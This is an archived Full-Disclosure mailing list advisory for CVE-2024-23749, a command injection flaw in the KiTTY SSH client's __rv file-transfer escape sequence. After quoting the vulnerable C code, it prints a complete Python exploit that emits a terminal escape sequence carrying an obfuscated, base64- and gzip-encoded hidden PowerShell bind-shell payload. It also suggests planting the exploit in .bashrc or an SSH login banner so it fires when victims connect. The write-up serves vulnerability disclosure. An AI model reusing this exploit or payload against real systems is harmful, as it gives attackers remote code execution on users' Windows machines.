lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <yp2h1KTdr64TlGaMC3sk0XAmra-fT_BapHVgJNq9hc5rdniz5BWikEIv_kud9C3YQF5Tk-x9nxf61Wd-r-gjWau-gR49oqN5YcQDjmjiDqw=@defcesco.io>
Date: Wed, 07 Feb 2024 18:00:10 +0000
From: Austin DeFrancesco via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Command Injection Vulnerability in KiTTY Get Remote File
	Through SCP Input (CVE-2024-23749)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)
===========================================================================================

Contents:
---------

Summary

Analysis

Exploitation

Acknowledgments

Timeline

Additional Advisory

Summary:
--------

Austin A. DeFrancesco (DEFCESCO) discovered a command injection vulnerability in KiTTY (https://github.com/cyd01/KiTTY/). This vulnerability:

-   Is exploitable by any KiTTY user connecting to a host with the embedded exploit;
-   The vulnerability was introduced in the original release in May 2021 (commit 4f79b1e) and affects all versions up to KiTTY ≤ 0.76.1.13 in their default configuration.

Austin developed an exploit for this vulnerability and obtained remote code execution in the context of the user running the application; by default, KiTTY can be operated in the user permission group of Standard Users. This exploit is stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.

Analysis:
---------

CVE-2024-23749 command injection vulnerability is in `kitty.c` precisely the `GetOneFile` function. The vulnerable lines of code are on lines `2369-2386`; in the latest revision `75fa2abcd220c172` (https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2369C4-L2391C2).

If KiTTY encounters the ANSI escape sequence `\\033]0;__rv` in a stream, it interprets it as an instruction to transfer files using Putty Secure Copy Protocol (PSCP):

-   `\\033`: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape sequence.
-   `]0;`: This sequence part indicates a metacommand will be defined.
-   `__rv`: This is the vulnerable KiTTY command to transfer files using PSCP, which takes the input of a filename or file path.
-   `\\077`: This is the terminator sequence to indicate the end of the escape sequence.
-   KiTTY’s `kitty.c` `__rv` command runs through specific handling based on the input parameters and configurations.

After the series of specific handling requests for other input parameters and configurations (at lines 2277-2368), KiTTY checks if the `filename` is larger than zero and checks if the `filename` is a directory or a single filename (at lines 2372). After these parameter and configuration checks, the filename is concatenated to the `buffer` (at line 2377). Finally, the constructed buffer is executed using the `system( buffer )` (at line 2386).

CVE-2024-24749, where the `filename` variable is vulnerable to command injection, occurs due to insufficient input sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This allows an attacker to add inputs inside the `filename` variable, leading to arbitrary code execution.

2369 if( filename[0]=='/' ) { 2370 strcat(buffer, filename ) ; 2371 } else { 2372 if( (directory!=NULL) && (strlen(directory)>0) && (strlen(filename)>0) ) { 2373 strcat( buffer, directory ) ; strcat( buffer, "/" ) ; strcat( buffer, filename ) ; 2374 } else if( (directory!=NULL) && (strlen(directory)>0) ) { 2375 strcat(buffer, directory ) ; strcat( buffer, "/*") ; 2376 } else { 2377 strcat(buffer, filename ) ; 2378 } 2379 } 2380 strcat( buffer, "\" \"" ) ; strcat( buffer, dir ) ; strcat( buffer, "\"" ) ; 2381 //strcat( buffer, " > kitty.log 2>&1" ) ; //if( !system( buffer ) ) unlink( "kitty.log" ) ; 2382 2383 chdir( InitialDirectory ) ; 2384 2385 if( debug_flag ) { debug_logevent( "Get on file: %s", buffer) ; } 2386 if( system( buffer ) ) { MessageBox( NULL, buffer, "Transfer problem", MB_OK|MB_ICONERROR ) ; } 2387 2388 //debug_log("%s\n",buffer);//MessageBox( NULL, buffer, "Info",MB_OK ); 2389 2390 memset(buffer,0,strlen(buffer)); 2391 }

Exploitation:
-------------

### __rv Command Injection:

>From an attacker’s point of view, the exploit CVE-2024-23749 can be inserted into the `.bashrc` file for all users or in the SSH warning/message of the day (MOTD) banner. The exploit will trigger once the user logs in or is presented with the SSH warning/MOTD banner.

KiTTY’s `__rv` function crashed (at line 2601) because adjacent memory was overwritten.

To reproduce the vulnerability, follow these steps:

1.  Start KiTTY and start an SSH session.
2.  Update the payload handler and payload documented in the exploit’s comments.
3.  Save the exploit on the connected SSH session.
4.  Execute the exploit using Python: `python3 CVE-2024-23749.py`.

    #!/usr/bin/python
    
    #----------------------------------------------------------------------------------------#
    # Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY                    #
    #        Get Remote File Through SCP Input (CVE-2024-23749)                              #
    # OS: Microsoft Windows 11/10/8/7/XP                                                     #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                               #
    # Software:                                                                              #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>    #
    #----------------------------------------------------------------------------------------#
    # More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY>             #
    #----------------------------------------------------------------------------------------#
    # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                             #
    # [*] Payload Handler Started as Job 1                                                   #
    # msf6 payload(cmd/windows/powershell_bind_tcp) >                                        #
    # [*] Started bind TCP handler against 192.168.100.28:4444                               #
    # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
    #----------------------------------------------------------------------------------------#
    
    import os
    import sys
    
    #-----------------------------------------------------------------#
    # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
    #-----------------------------------------------------------------#
    
    shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
    shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
    shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
    shellcode += b'se64String(((\\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
    shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\\'+\\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
    shellcode += b'kvUBgYPA3APsGG\\'+\\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
    shellcode += b'jBeXa\\'+\\'QgRGld\\'+\\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
    shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\\'+\\'AFWMm85{2}gI/hVGUK'
    shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\\'+\\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
    shellcode += b'8kWhDlXHr\\'+\\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
    shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
    shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
    shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\\'+'
    shellcode += b'\\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\\'+'
    shellcode += b'\\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\\'+\\'1Txf3SQJhG8E/BlNRyY'
    shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\\'+\\'T3Ztk3Tt{2}2'
    shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
    shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
    shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\\'+\\'IyoERfSimrYbXTGP{1}g1Jc'
    shellcode += b'7\\'+\\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
    shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
    shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\\')-f'
    shellcode += b'\\'=\\',\\'9\\',\\'O\\')))),[System.IO.Compression.CompressionMode]::Decompr'
    shellcode += b'ess))).ReadToEnd()))\\"'
    
    escape_sequence = b'\\033]0;__rv:'
    escape_sequence += b'" & '
    escape_sequence += shellcode
    escape_sequence += b' #\\007' 
    
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()
    

Acknowledgments:
----------------

Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.

Timeline:
---------

2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont; no reply from Cyril.

2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.

2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).

Additional Advisory:
--------------------

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables: https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail

wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAAFkhAQD2y/dueupEMnNKAxNfh243Q25I+ofw2gxvT1cg6nkniQEAgH5A
7uuWKGMhwDEqQCrVtc2+yZ3h1hbdJI/8ZbCLhAc=
=j94V
-----END PGP SIGNATURE-----

Download attachment "publickey - austin@...cesco.io - 0x4D9E1D34.asc" of type "application/pgp-keys" (584 bytes)

Download attachment "publickey - austin@...cesco.io - 0x4D9E1D34.asc.sig" of type "application/pgp-signature" (119 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ